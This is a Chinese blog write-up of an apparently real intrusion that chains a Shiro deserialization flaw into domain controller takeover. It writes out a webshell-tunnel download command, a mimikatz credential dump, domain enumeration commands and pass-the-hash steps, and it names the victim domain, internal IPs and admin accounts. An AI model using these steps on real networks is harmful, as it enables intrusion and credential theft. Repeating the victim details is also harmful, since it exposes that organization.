实战-从Shiro反序列化到域控

admin 2025年4月25日00:36:09评论0 views字数 1729阅读5分45秒阅读模式
免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

WEB打点

开局一个登录框,从翻看js到目录扫描都没有什么大收获,然后在对登录框进行测试时,发现了一个rememberMe=deleteMe,然后瞬间狂喜,这不是我的好兄弟,Shiro吗?

实战-从Shiro反序列化到域控

然后想都不想,立马拿出我的大宝剑就是来上一梭子。

shiro反序列化漏洞利用

然后使用工具也是简单的跑出来密钥和利用链。实战-从Shiro反序列化到域控

进行命令执行发现 可以成功执行,且存在域环境

实战-从Shiro反序列化到域控

然后发现有域,那就先简单查下看看有没有杀软吧。

实战-从Shiro反序列化到域控

然后一套组合拳打上去,发现打到棉花上了!!!!!
实战-从Shiro反序列化到域控

怪不得我的反弹shell,没有成功。八成因为杀软存在!

然后经过我老道的经验,也是一下子就找到了根目录C:Program Files (x86)BioSecurityMainResourcetomcatwebappsROOT

想着试试免杀马,能不能上传,然后来操作,毕竟使用工具渗透还是有点不方便。

实战-从Shiro反序列化到域控

结果显示如上,估计是java环境太低,导致不解析这个木马吧。索性转头就上传一个suo5来挂一个http隧道。

cd C:Program Files (x86)BioSecurityMainResourcetomcatwebappsROOT & powershell.exe -Command "Invoke-WebRequest -Uri http://127.0.0.1:8080/suo5.jsp -OutFile suo5.jsp"   上传suo5.jsp

尝试suo5连接成功

实战-从Shiro反序列化到域控

使用Proxifier工具进行代理,远程登录

实战-从Shiro反序列化到域控

虽然成功登录,但是存在一个杀软很是头疼,目前也没有什么免杀的工具使用,所以先看看能不能有什么骚姿势来绕过吧。

经过长达2分半的信息收集,果然皇天不负有心人,运维人员也是心大,在同一安装和卸载BitDefender  (XDR)时,图方便留下了bat脚本,然后还没有删除。

实战-从Shiro反序列化到域控

脚本里面也是成功的留下了卸载的密码,然后我也是不出意外的直接执行脚本,成功卸载杀软!

实战-从Shiro反序列化到域控

 然后使用和suo5文件上传操作一样,将后门文件下载下来并执行,成功上线cs

实战-从Shiro反序列化到域控

在shiro工具里面执行后门文件,直接得到一个system权限的会话

域渗透

使用cmd命令对其他域内信息收集

当前主机名称  hostname    PAKAR08域内用户 net user /domain辅助域控  net time /domain  PAKAR07.grupopakar.com.mx  192.168.101.7查询域管理员用户  net group "domain admins" /domain查询当前用户属于哪个域控  net config Workstation 或者使用(net qury dpc)查看主域控目标主域控  grupopakar.com.mx  192.168.101.3
查看域内用户 net user /domain
实战-从Shiro反序列化到域控
查询当前用户属于哪个域控net config Workstationping 以下发现域控IP为 192.168.101.3
实战-从Shiro反序列化到域控
查询域管理员用户net group "domain admins" /domain
实战-从Shiro反序列化到域控

这里查看当前域内的域管理员账户,然后注意看圈住的两个账户,下面要考!!

bloodhund进行信息收集

发现当前机器与两个域管账户有过会话

elias.nolasco和sebastian.candia两个域管账户

实战-从Shiro反序列化到域控

猕猴桃提取凭据

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" > pssword.txt

将结果输出到一个文件下面,在本地将其下载下来

然后查看文件,你们猜发现了什么??

实战-从Shiro反序列化到域控
实战-从Shiro反序列化到域控

PTH攻击

使用suo5代理,直接在本地攻击,工具使用的是impacket-python包里的工具成功横移到域控

实战-从Shiro反序列化到域控

横移成功

登录域控主机

1、使用cmd5网站进行hash爆破,爆出elias.nolasco用户密码

实战-从Shiro反序列化到域控

2、或和通过pth攻击获得的shell进行创建用户进行登录(域管用户默认加入本地管理员组)

原文始发于微信公众号(伍六七安全):实战-从Shiro反序列化到域控

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月25日00:36:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   实战-从Shiro反序列化到域控https://cn-sec.com/archives/3958286.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息